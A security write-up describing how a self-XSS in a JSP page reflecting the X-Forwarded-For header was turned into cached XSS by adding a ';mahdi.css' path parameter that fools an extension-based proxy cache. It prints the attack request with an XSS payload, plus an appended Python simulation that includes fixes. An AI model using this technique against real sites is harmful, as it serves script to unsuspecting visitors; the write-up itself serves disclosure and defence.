ElMahdi - マハディ


Cache Poisoning via SelfXSS + Path Parameter

elmahdi 2021. 8. 28. 09:37

In this write-up I explain how I turned a self-XSS into an XSS served to other visitors of a JSP application, by getting the reflected payload stored in the web cache.


While searching the Wayback Machine (web.archive.org) for JSP files of the target, I found a file named common.jsp that returned the visitor's IP address. As most testers would, I checked whether that value could be controlled through request headers such as X-Forwarded-For, and it could: the header value was reflected in the response body without any encoding.


On its own this is only a self-XSS, because a request header set by the attacker affects nobody else's response. To reach other users I needed the poisoned response to be cached, so I tried the usual routes: unkeyed query-string parameters as a cache key, and web cache deception by requesting common.jsp/css.css so the proxy would treat it as a static file. None of them worked.


While thinking about other options I remembered that Java servlet containers support path parameters: anything after a semicolon in a path segment (the familiar ;jsessionid=... is one) is stripped before the resource is resolved. So I checked whether appending a path parameter ending in .css would make the proxy cache the response as a stylesheet while the backend still served common.jsp:

GET /folder/common.jsp;mahdi.css HTTP/1.1
Host: target.com 
X-Forwarded-For: <svg/onload=alert(document.domain)>

Backend: treats everything after the semicolon as a path parameter, drops it, serves common.jsp and reflects the X-Forwarded-For payload in the body.

Proxy: sees a URL ending in .css, applies its static-file rule and caches the response under that path. Anyone who then requests /folder/common.jsp;mahdi.css receives the cached body with the payload in it, which is what turns the self-XSS into one that fires for other users.

To confirm that the cache is really poisoned, request the same URL again without the X-Forwarded-For header (ideally from a different IP address): if the payload is still in the body, the cached copy is being served rather than a fresh response from the backend.
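The following Python script is an added example of my own, not code from the original post or from the target application. It models the two sides described above and assumes, hypothetically, that the backend strips semicolon path parameters from each segment the way Tomcat does and that the proxy caches any URL whose last path segment ends in a static extension; target.com, STATIC_EXT, Proxy, common_jsp and poison_and_verify are names chosen for the example. It also shows the two fixes that close the gap: keying the cache on the normalized path, or output-encoding the reflected header so a cached copy carries no payload.

```python
"""Added example (not the author's code): model of why common.jsp;mahdi.css
poisons an extension-keyed cache.  Assumed behaviour, not taken from the page:
the backend strips ';' path parameters per segment as Tomcat does, and the
proxy caches any URL whose last path segment ends in a static extension."""
import html
from urllib.parse import urlsplit

# Hypothetical static-extension rule of the caching proxy (assumption).
STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".woff")
PAYLOAD = "<svg/onload=alert(document.domain)>"


def strip_path_params(path: str) -> str:
    """Drop ';...' path parameters from every segment before resolving the
    resource, as a Java servlet container does (e.g. ;jsessionid=...)."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def backend_resource(url: str) -> str:
    """Resource the backend actually serves for a raw request URL."""
    return strip_path_params(urlsplit(url).path)


def proxy_caches(url: str, key_on_normalized: bool = False) -> bool:
    """Extension-based cache decision.  The weak rule inspects the raw path;
    the hardened variant applies the same rule after stripping path parameters."""
    path = urlsplit(url).path
    if key_on_normalized:
        path = strip_path_params(path)
    return path.rsplit("/", 1)[-1].lower().endswith(STATIC_EXT)


def cache_key_mismatch(url: str) -> bool:
    """True when the proxy would cache a URL that the backend maps to a dynamic page."""
    return proxy_caches(url) and not backend_resource(url).lower().endswith(STATIC_EXT)


def common_jsp(headers: dict, remote_addr: str = "203.0.113.5") -> str:
    """Stand-in for the vulnerable common.jsp: reflects X-Forwarded-For unencoded."""
    return f"<p>Your IP: {headers.get('X-Forwarded-For', remote_addr)}</p>"


def common_jsp_fixed(headers: dict, remote_addr: str = "203.0.113.5") -> str:
    """Same page with output encoding, which removes the XSS even if cached."""
    return f"<p>Your IP: {html.escape(headers.get('X-Forwarded-For', remote_addr))}</p>"


class Proxy:
    """Minimal caching proxy.  key_on_normalized=True keys and decides on the
    backend-normalized path, closing the mismatch the trick relies on."""

    def __init__(self, key_on_normalized: bool = False, backend=common_jsp):
        self.key_on_normalized = key_on_normalized
        self.backend = backend
        self.cache = {}

    def fetch(self, url: str, headers=None) -> str:
        path = urlsplit(url).path
        key = strip_path_params(path) if self.key_on_normalized else path
        if key in self.cache:
            return self.cache[key]          # cache hit: victims get this body
        body = self.backend(headers or {})
        if proxy_caches(url, self.key_on_normalized):
            self.cache[key] = body
        return body


def poison_and_verify(proxy: Proxy, url: str, payload: str = PAYLOAD) -> bool:
    """Attacker request carrying the payload, then a victim request with no
    header.  True means the victim received the payload: the cache is poisoned."""
    proxy.fetch(url, {"X-Forwarded-For": payload})
    return payload in proxy.fetch(url)


if __name__ == "__main__":
    url = "http://target.com/folder/common.jsp;mahdi.css"
    print("backend serves:", backend_resource(url))
    print("proxy caches:", proxy_caches(url))
    print("poisoned (weak proxy):", poison_and_verify(Proxy(), url))
    print("poisoned (normalized key):", poison_and_verify(Proxy(key_on_normalized=True), url))
    print("poisoned (encoded output):", poison_and_verify(Proxy(backend=common_jsp_fixed), url))
```

The cache_key_mismatch check is the part worth reusing during a test: feed it the candidate URLs (with and without the ;x.css suffix) and it tells you whether the proxy's view of the resource diverges from the backend's, which is exactly the condition that made the plain common.jsp/css.css deception attempt fail and the path-parameter variant succeed.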